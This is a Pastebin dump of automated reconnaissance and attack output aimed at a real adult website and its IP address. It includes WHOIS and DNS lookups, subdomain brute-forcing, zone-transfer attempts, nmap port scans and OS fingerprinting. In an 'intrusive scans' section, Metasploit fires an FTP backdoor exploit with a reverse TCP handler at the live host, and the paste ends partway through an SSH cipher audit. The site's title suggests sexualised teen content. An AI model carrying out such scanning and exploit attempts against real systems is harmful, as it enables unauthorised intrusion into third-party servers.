Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname nn-stars.net ISP Quasi Networks LTD. (AS29073)
- Continent Africa Flag
- SC
- Country Seychelles Country Code SC (SYC)
- Region Unknown Local time 27 Oct 2017 10:06 +04
- City Unknown Latitude -4.583
- IP Address 93.174.91.164 Longitude 55.667
- #######################################################################################################################################
- [i] Scanning Site: http://nn-stars.net
- B A S I C I N F O
- ====================
- [+] Site Title: sexy teenspictures, teen angie
- [+] IP address: 93.174.91.164
- [+] Web Server: nginx
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- W H O I S L O O K U P
- ========================
- Domain Name: NN-STARS.NET
- Registry Domain ID: 1777282513_DOMAIN_NET-VRSN
- Registrar WHOIS Server: whois.registrationtek.com
- Registrar URL: http://www.RegistrationTek.com
- Updated Date: 2017-04-19T11:16:35Z
- Creation Date: 2013-01-30T14:29:12Z
- Registry Expiry Date: 2018-01-30T14:29:12Z
- Registrar: Registration Technologies, Inc.
- Registrar IANA ID: 321
- Registrar Abuse Contact Email:
- Registrar Abuse Contact Phone:
- Domain Status: ok https://icann.org/epp#ok
- Name Server: DNS1.REGISTRATIONTEK.COM
- Name Server: DNS2.REGISTRATIONTEK.COM
- Name Server: DNS3.REGISTRATIONTEK.COM
- Name Server: DNS4.REGISTRATIONTEK.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2017-10-27T06:08:01Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- G E O I P L O O K U P
- =========================
- [i] IP Address: 93.174.91.164
- [i] Country: SC
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: -4.583300
- [i] Longitude: 55.666698
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.1 200 OK
- [i] Server: nginx
- [i] Date: Fri, 27 Oct 2017 06:12:10 GMT
- [i] Content-Type: text/html
- [i] Connection: close
- [i] Vary: Accept-Encoding
- [i] X-Powered-By: PHP/5.4.45-0+deb7u8
- [i] Set-Cookie: from=spiders; expires=Sat, 28-Oct-2017 06:12:10 GMT; path=/
- [i] Set-Cookie: lfrom=spiders; expires=Fri, 03-Nov-2017 06:12:10 GMT; path=/
- [i] Set-Cookie: idcheck=1509084730; expires=Sat, 28-Oct-2017 06:12:10 GMT; path=/
- [i] Set-Cookie: vs=spiders%7C; expires=Sat, 28-Oct-2017 06:12:10 GMT; path=/
- [i] Set-Cookie: index_page=1; expires=Sat, 28-Oct-2017 06:12:10 GMT; path=/
- [i] Vary: Accept-Encoding
- D N S L O O K U P
- ===================
- nn-stars.net. 586 IN A 93.174.91.164
- nn-stars.net. 7199 IN NS dns1.registrationtek.com.
- nn-stars.net. 7199 IN NS dns2.registrationtek.com.
- nn-stars.net. 7199 IN NS dns3.registrationtek.com.
- nn-stars.net. 7199 IN NS dns4.registrationtek.com.
- nn-stars.net. 7199 IN SOA dns1.registrationtek.com. support.registrationtek.com. 1492539453 3600 600 1209600 3600
- nn-stars.net. 7199 IN TXT "Free DNS from Registration Technologies, Inc., an ICANN accredited registrar!"
- nn-stars.net. 7199 IN TXT "Web: www.RegistrationTek.com"
- nn-stars.net. 7199 IN TXT "Email: support@RegistrationTek.com"
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 93.174.91.164
- Network = 93.174.91.164 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 93.174.91.164 - 93.174.91.164 }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-27 06:08 UTC
- Nmap scan report for nn-stars.net (93.174.91.164)
- Host is up (0.089s latency).
- rDNS record for 93.174.91.164: no-reverse-dns-configured.com
- PORT STATE SERVICE VERSION
- 21/tcp open ftp vsftpd 3.0.2
- 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
- 23/tcp closed telnet
- 25/tcp closed smtp
- 80/tcp open http nginx
- 110/tcp closed pop3
- 143/tcp closed imap
- 443/tcp closed https
- 445/tcp closed microsoft-ds
- 3389/tcp closed ms-wbt-server
- Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds
- S U B - D O M A I N F I N D E R
- ==================================
- [i] Total Subdomains Found : 1
- [+] Subdomain: nn-stars.net
- [-] IP: 93.174.91.164
- [*] Performing TLD Brute force Enumeration against nn-stars.net
- [*] The operation could take up to: 00:01:07
- [*] A nn-stars.biz.af 5.45.75.45
- [*] A nn-stars.co.asia 91.195.240.135
- [*] CNAME nn-stars.biz.at free.biz.at
- [*] A free.biz.at 216.92.134.29
- [*] A nn-stars.com.ax 185.55.85.123
- [*] A nn-stars.org.aw 142.4.20.12
- [*] A nn-stars.org.ax 185.55.85.123
- [*] A nn-stars.com.ba 195.222.33.180
- [*] A nn-stars.co.ba 176.9.45.78
- [*] A nn-stars.com.be 95.173.170.166
- [*] A nn-stars.biz.by 71.18.52.2
- [*] A nn-stars.biz.bz 199.59.242.150
- [*] A nn-stars.net.cc 54.252.89.206
- [*] A nn-stars.com.cc 54.252.107.64
- [*] A nn-stars.co.cc 175.126.123.219
- [*] A nn-stars.org.ch 72.52.4.122
- [*] A nn-stars.co.cm 85.25.140.105
- [*] A nn-stars.biz.cl 185.53.178.8
- [*] A nn-stars.net.cm 85.25.140.105
- [*] A nn-stars.com.com 52.33.196.199
- [*] A nn-stars.co.com 173.192.115.17
- [*] A nn-stars.net.com 199.59.242.150
- [*] A nn-stars.com 195.56.193.78
- [*] A nn-stars.org.com 23.23.86.44
- [*] CNAME nn-stars.biz.cm i.cns.cm
- [*] A i.cns.cm 118.184.56.30
- [*] A nn-stars.biz.cr 72.52.4.122
- [*] A nn-stars.biz.cx 72.52.4.122
- [*] A nn-stars.com.cz 62.109.128.30
- [*] A nn-stars.net.cz 80.250.24.177
- [*] A nn-stars.biz.cz 185.53.179.7
- [*] A nn-stars.com.de 50.56.68.37
- [*] CNAME nn-stars.co.de co.de
- [*] A co.de 144.76.162.245
- [*] CNAME nn-stars.org.de www.org.de
- [*] A www.org.de 78.47.128.8
- [*] A nn-stars.net.eu 78.46.90.98
- [*] A nn-stars.org.eu 78.46.90.98
- [*] A nn-stars.biz.fi 185.55.85.123
- [*] A nn-stars.fm 173.230.131.38
- [*] A nn-stars.biz.fm 173.230.131.38
- [*] A nn-stars.org.fr 149.202.133.35
- [*] A nn-stars.biz.gl 72.52.4.122
- [*] CNAME nn-stars.co.gp co.gp
- [*] A co.gp 144.76.162.245
- [*] A nn-stars.co.hn 208.100.40.203
- [*] CNAME nn-stars.net.hr net.hr
- [*] A net.hr 192.0.78.25
- [*] A net.hr 192.0.78.24
- [*] A nn-stars.co.ht 72.52.4.122
- [*] CNAME nn-stars.biz.hn parkmydomain.vhostgo.com
- [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
- [*] A westuser.dopa.com 107.186.245.119
- [*] A nn-stars.co.jobs 50.17.193.222
- [*] A nn-stars.com.jobs 50.19.241.165
- [*] A nn-stars.net.jobs 50.19.241.165
- [*] A nn-stars.biz.jobs 50.19.241.165
- [*] A nn-stars.org.jobs 50.19.241.165
- [*] A nn-stars.la 173.230.141.80
- [*] A nn-stars.co.la 195.110.124.154
- [*] CNAME nn-stars.biz.li 712936.parkingcrew.net
- [*] A 712936.parkingcrew.net 185.53.179.29
- [*] A nn-stars.biz.lu 195.26.5.2
- [*] A nn-stars.biz.ly 64.136.20.39
- [*] A nn-stars.biz.md 72.52.4.122
- [*] A nn-stars.co.mk 87.76.31.211
- [*] A nn-stars.co.mobi 54.225.105.179
- [*] A nn-stars.biz.my 202.190.174.44
- [*] A nn-stars.net 93.174.91.164
- [*] A nn-stars.co.net 188.166.216.219
- [*] A nn-stars.net.net 52.50.81.210
- [*] A nn-stars.org.net 23.23.86.44
- [*] A nn-stars.co.nl 37.97.184.204
- [*] A nn-stars.com.nl 83.98.157.102
- [*] A nn-stars.net.nl 83.98.157.102
- [*] A nn-stars.co.nr 208.100.40.202
- [*] A nn-stars.net.nu 199.102.76.78
- [*] CNAME nn-stars.co.nu co.nu
- [*] A co.nu 144.76.162.245
- [*] CNAME nn-stars.com.nu com.nu
- [*] A com.nu 144.76.162.245
- [*] A nn-stars.org.nu 80.92.84.139
- [*] A nn-stars.com.org 23.23.86.44
- [*] CNAME nn-stars.net.org pewtrusts.org
- [*] A pewtrusts.org 204.74.99.100
- [*] A nn-stars.ph 45.79.222.138
- [*] A nn-stars.co.ph 45.79.222.138
- [*] A nn-stars.com.ph 45.79.222.138
- [*] A nn-stars.net.ph 45.79.222.138
- [*] A nn-stars.org.ph 45.79.222.138
- [*] A nn-stars.co.pl 212.91.6.55
- [*] A nn-stars.org.pm 208.73.211.177
- [*] A nn-stars.org.pm 208.73.210.202
- [*] A nn-stars.org.pm 208.73.211.165
- [*] A nn-stars.org.pm 208.73.210.217
- [*] CNAME nn-stars.biz.ps biz.ps
- [*] A biz.ps 144.76.162.245
- [*] A nn-stars.co.pt 194.107.127.52
- [*] A nn-stars.pw 141.8.226.58
- [*] A nn-stars.co.pw 141.8.226.59
- [*] A nn-stars.co.ps 66.96.132.56
- [*] A nn-stars.net.pw 141.8.226.59
- [*] A nn-stars.biz.pw 141.8.226.59
- [*] A nn-stars.org.pw 141.8.226.59
- [*] A nn-stars.net.ro 69.64.52.127
- [*] A nn-stars.org.re 217.70.184.38
- [*] CNAME nn-stars.co.ro now.co.ro
- [*] A now.co.ro 185.27.255.9
- [*] A nn-stars.com.ru 178.210.89.119
- [*] A nn-stars.biz.sb 72.52.4.122
- [*] A nn-stars.biz.se 185.53.179.6
- [*] CNAME nn-stars.net.se 773147.parkingcrew.net
- [*] A 773147.parkingcrew.net 185.53.179.29
- [*] A nn-stars.co.sl 91.195.240.135
- [*] A nn-stars.com.sr 143.95.106.249
- [*] A nn-stars.co.su 72.52.4.122
- [*] A nn-stars.biz.st 91.121.28.115
- [*] A nn-stars.biz.tc 64.136.20.39
- [*] A nn-stars.biz.tf 85.236.153.18
- [*] A nn-stars.net.tf 188.40.70.29
- [*] A nn-stars.net.tf 188.40.117.12
- [*] A nn-stars.net.tf 188.40.70.27
- [*] A nn-stars.co.tl 208.100.40.202
- [*] A nn-stars.co.to 175.118.124.44
- [*] A nn-stars.co.tv 31.186.25.163
- [*] A nn-stars.biz.tv 72.52.4.122
- [*] A nn-stars.org.tv 72.52.4.122
- [*] CNAME nn-stars.biz.uz biz.uz
- [*] A biz.uz 144.76.162.245
- [*] A nn-stars.vg 88.198.29.97
- [*] A nn-stars.co.vg 88.198.29.97
- [*] A nn-stars.com.vg 88.198.29.97
- [*] A nn-stars.net.vg 166.62.28.147
- [*] A nn-stars.biz.vg 89.31.143.20
- [*] A nn-stars.com.ws 202.4.48.211
- [*] A nn-stars.net.ws 202.4.48.211
- [*] A nn-stars.org.ws 202.4.48.211
- [*] A nn-stars.ws 64.70.19.203
- [*] A nn-stars.biz.ws 184.168.221.104
- inetnum: 93.174.91.0 - 93.174.91.255
- netname: SC-QUASI52
- descr: QUASI
- country: SC
- org: ORG-QNL3-RIPE
- admin-c: QNL1-RIPE
- tech-c: QNL1-RIPE
- status: ASSIGNED PA
- mnt-by: QUASINETWORKS-MNT
- mnt-lower: QUASINETWORKS-MNT
- mnt-routes: QUASINETWORKS-MNT
- created: 2016-01-23T22:20:58Z
- last-modified: 2016-01-23T22:20:58Z
- source: RIPE
- organisation: ORG-QNL3-RIPE
- org-name: Quasi Networks LTD.
- org-type: OTHER
- address: Suite 1, Second Floor
- address: Sound & Vision House, Francis Rachel Street
- address: Victoria, Mahe, SEYCHELLES
- remarks: *****************************************************************************
- remarks: IMPORTANT INFORMATION
- remarks: *****************************************************************************
- remarks: We are a high bandwidth network provider offering bandwidth solutions.
- remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
- remarks: Please only use abuse@quasinetworks.com for abuse reports.
- remarks: For all other requests, please see the details on our website.
- remarks: *****************************************************************************
- abuse-mailbox: abuse@quasinetworks.com
- abuse-c: AR34302-RIPE
- mnt-ref: QUASINETWORKS-MNT
- mnt-by: QUASINETWORKS-MNT
- created: 2015-11-08T22:25:26Z
- last-modified: 2015-11-27T09:37:50Z
- source: RIPE # Filtered
- role: Quasi Networks LTD
- address: Suite 1, Second Floor
- address: Sound & Vision House, Francis Rachel Street
- address: Victoria, Mahe, SEYCHELLES
- remarks: *****************************************************************************
- remarks: IMPORTANT INFORMATION
- remarks: *****************************************************************************
- remarks: We are a high bandwidth network provider offering bandwidth solutions.
- remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
- remarks: Please only use abuse@quasinetworks.com for abuse reports.
- remarks: For all other requests, please see the details on our website.
- remarks: *****************************************************************************
- abuse-mailbox: abuse@quasinetworks.com
- nic-hdl: QNL1-RIPE
- mnt-by: QUASINETWORKS-MNT
- created: 2015-11-07T22:43:04Z
- last-modified: 2015-11-07T23:04:49Z
- source: RIPE # Filtered
- % Information related to '93.174.88.0/21as29073'
- route: 93.174.88.0/21
- descr: Quasi Networks LTD (IBC)
- origin: as29073
- mnt-by: QUASINETWORKS-MNT
- created: 2008-06-20T15:33:47Z
- last-modified: 2016-01-23T22:26:12Z
- source: RIPE
- % This query was served by the RIPE Database Query Service version 1.90 (ANGUS)
- [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +[0m
- Server: 192.168.1.254
- Address: 192.168.1.254#53
- Non-authoritative answer:
- Name: nn-stars.net
- Address: 93.174.91.164
- nn-stars.net has address 93.174.91.164
- [92m + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +[0m
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is nn-stars.net
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 93.174.91.164. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 93.174.91.164. Module test failed
- [-] No distance calculation. 93.174.91.164 appears to be dead or no ports known
- [+] Host: 93.174.91.164 is up (Guess probability: 50%)
- [+] Target: 93.174.91.164 is alive. Round-Trip Time: 0.49963 sec
- [+] Selected safe Round-Trip Time value is: 0.99927 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [+] Primary guess:
- [+] Host 93.174.91.164 Running OS: (Guess probability: 100%)
- [+] Other guesses:
- [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
- [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
- [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
- [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
- [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
- [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
- [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
- [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
- [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- [92m + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +[0m
- Domain Name: NN-STARS.NET
- Registry Domain ID: 1777282513_DOMAIN_NET-VRSN
- Registrar WHOIS Server: whois.registrationtek.com
- Registrar URL: http://www.RegistrationTek.com
- Updated Date: 2017-04-19T11:16:35Z
- Creation Date: 2013-01-30T14:29:12Z
- Registry Expiry Date: 2018-01-30T14:29:12Z
- Registrar: Registration Technologies, Inc.
- Registrar IANA ID: 321
- Registrar Abuse Contact Email:
- Registrar Abuse Contact Phone:
- Domain Status: ok https://icann.org/epp#ok
- Name Server: DNS1.REGISTRATIONTEK.COM
- Name Server: DNS2.REGISTRATIONTEK.COM
- Name Server: DNS3.REGISTRATIONTEK.COM
- Name Server: DNS4.REGISTRATIONTEK.COM
- DNSSEC: unsigned
- Domain Name: nn-stars.net
- Registry Domain ID: 1777282513_DOMAIN_NET-VRSN
- Registrar WHOIS Server: whois.registrationtek.com
- Registrar URL: https://www.registrationtek.com/whois-i/regtek_whois.php
- Updated Date: 2017-04-19T11:16:35Z
- Creation Date: 2013-01-30T14:29:12Z
- Registrar Registration Expiration Date: 2018-01-30T14:29:12Z
- Registrar: Registration Technologies, Inc.
- Registrar IANA ID: 321
- Registrar Abuse Contact Email: illegal@registrationtek.com
- Registrar Abuse Contact Phone: +1.4016482137
- Domain Status: OK https://icann.org/epp#OK
- Registry Registrant ID:
- Registrant Name:
- Registrant Organization: Registration Technologies, Inc.
- Registrant Street: PMB: 43423, 400 Putnam Pike, STE D203
- Registrant City: Smithfield
- Registrant State/Province: RI
- Registrant Postal Code: 02917-2442
- Registrant Country: US
- Registrant Phone: +1.4016480147
- Registrant Phone Ext:
- Registrant Fax:
- Registrant Fax Ext:
- Registrant Email: NOSPAM-43423@RTWhoisEnvoy.net
- Registry Admin ID:
- Admin Name:
- Admin Organization: Registration Technologies, Inc.
- Admin Street: PMB: 43423, 400 Putnam Pike, STE D203
- Admin City: Smithfield
- Admin State/Province: RI
- Admin Postal Code: 02917-2442
- Admin Country: US
- Admin Phone: +1.4016480147
- Admin Phone Ext:
- Admin Fax:
- Admin Fax Ext:
- Admin Email: NOSPAM-43423@RTWhoisEnvoy.net
- Registry Tech ID:
- Tech Name:
- Tech Organization: Registration Technologies, Inc.
- Tech Street: PMB: 43423, 400 Putnam Pike, STE D203
- Tech City: Smithfield
- Tech State/Province: RI
- Tech Postal Code: 02917-2442
- Tech Country: US
- Tech Phone: +1.4016480147
- Tech Phone Ext:
- Tech Fax:
- Tech Fax Ext:
- Tech Email: NOSPAM-43423@RTWhoisEnvoy.net
- Name Server: DNS1.REGISTRATIONTEK.COM
- Name Server: DNS2.REGISTRATIONTEK.COM
- Name Server: DNS3.REGISTRATIONTEK.COM
- Name Server: DNS4.REGISTRATIONTEK.COM
- DNSSEC: unsigned
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- 93.174.91.164:Img.nn-stars.net
- 93.174.91.164:img.nn-stars.net
- 93.174.91.164:www.nn-stars.net
- [92m + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +[0m
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x nn-stars.net
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14625
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;net.nn-stars.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102402 1800 900 604800 3600
- ;; Query time: 37 msec
- ;; SERVER: 192.168.1.254#53(192.168.1.254)
- ;; WHEN: Fri Oct 27 02:08:11 EDT 2017
- ;; MSG SIZE rcvd: 122
- dnsenum VERSION:1.2.4
- [1;34m
- ----- nn-stars.net -----
- [0m[1;31m
- Host's addresses:
- __________________
- [0mnn-stars.net. 432 IN A 93.174.91.164
- [1;31m
- Name Servers:
- ______________
- [0mdns4.registrationtek.com. 7200 IN A 193.70.95.140
- dns1.registrationtek.com. 7200 IN A 72.46.65.111
- dns3.registrationtek.com. 7031 IN A 185.122.59.99
- dns2.registrationtek.com. 7200 IN A 107.150.4.135
- [1;31m
- Mail (MX) Servers:
- ___________________
- [0m[1;31m
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- [0m
- Trying Zone Transfer for nn-stars.net on dns4.registrationtek.com ...
- Trying Zone Transfer for nn-stars.net on dns1.registrationtek.com ...
- Trying Zone Transfer for nn-stars.net on dns3.registrationtek.com ...
- Trying Zone Transfer for nn-stars.net on dns2.registrationtek.com ...
- brute force file not specified, bay.
- [92m + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +[0m
- [91m
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [94m[-] Enumerating subdomains now for nn-stars.net[0m
- [93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
- [92m[-] Searching now in Baidu..[0m
- [92m[-] Searching now in Yahoo..[0m
- [92m[-] Searching now in Google..[0m
- [92m[-] Searching now in Bing..[0m
- [92m[-] Searching now in Ask..[0m
- [92m[-] Searching now in Netcraft..[0m
- [92m[-] Searching now in DNSdumpster..[0m
- [92m[-] Searching now in Virustotal..[0m
- [92m[-] Searching now in ThreatCrowd..[0m
- [92m[-] Searching now in SSL Certificates..[0m
- [92m[-] Searching now in PassiveDNS..[0m
- [91mVirustotal: [0mwww.nn-stars.net
- [91mVirustotal: [0mimg.nn-stars.net
- [93m[-] Saving results to file: [0m[91m/usr/share/sniper/loot/domains/domains-nn-stars.net.txt[0m
- [93m[-] Total Unique Subdomains Found: 2[0m
- [92mwww.nn-stars.net[0m
- [92mimg.nn-stars.net[0m
- [91m ââââŠââââŠââââ⊠âŠ[0m
- [91m â â âŠâ â ââââ ââ£[0m
- [91m ââââ©ââ â©oââââ© â©[0m
- [91m + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +[0m
- [94m
- [91m [+] Domains saved to: /usr/share/sniper/loot/domains/domains-nn-stars.net-full.txt
- [0m
- [92m + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +[0m
- [92m + -- ----------------------------=[Checking Email Security]=----------------- -- +[0m
- [92m + -- ----------------------------=[Pinging host]=---------------------------- -- +[0m
- PING nn-stars.net (93.174.91.164) 56(84) bytes of data.
- 64 bytes from no-reverse-dns-configured.com (93.174.91.164): icmp_seq=1 ttl=58 time=115 ms
- --- nn-stars.net ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 115.888/115.888/115.888/0.000 ms
- [92m + -- ----------------------------=[Running TCP port scan]=------------------- -- +[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:08 EDT
- Nmap scan report for nn-stars.net (93.174.91.164)
- Host is up (0.17s latency).
- rDNS record for 93.174.91.164: no-reverse-dns-configured.com
- Not shown: 40 closed ports, 4 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 111/tcp open rpcbind
- Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
- [92m + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +[0m
- [93m + -- --=[Port 21 opened... running tests...[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:08 EDT
- Nmap scan report for nn-stars.net (93.174.91.164)
- Host is up (0.021s latency).
- rDNS record for 93.174.91.164: no-reverse-dns-configured.com
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 109.38 ms 10.13.0.1
- 2 ...
- 3 109.42 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
- 4 185.72 ms 10.95.33.10
- 5 115.83 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
- 6 ...
- 7 115.65 ms no-reverse-dns-configured.com (93.174.91.164)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 12.48 seconds
- =[ [33mmetasploit v4.16.12-dev[0m ]
- + -- --=[ 1693 exploits - 968 auxiliary - 299 post ]
- + -- --=[ 499 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [0m[0mRHOST => nn-stars.net
- [0mRHOSTS => nn-stars.net
- [0m[1m[34m[*][0m nn-stars.net:21 - Banner: 220 (vsFTPd 3.0.2)
- [1m[34m[*][0m nn-stars.net:21 - USER: 331 Please specify the password.
- [1m[34m[*][0m Exploit completed, but no session was created.
- [0m[0m[1m[34m[*][0m Started reverse TCP double handler on 10.13.4.10:4444
- [1m[34m[*][0m nn-stars.net:21 - Sending Backdoor Command
- [1m[34m[*][0m Exploit completed, but no session was created.
- [0m[93m + -- --=[Port 22 opened... running tests...[0m
- # general
- (gen) banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6
- (gen) software: OpenSSH 6.0p1
- (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
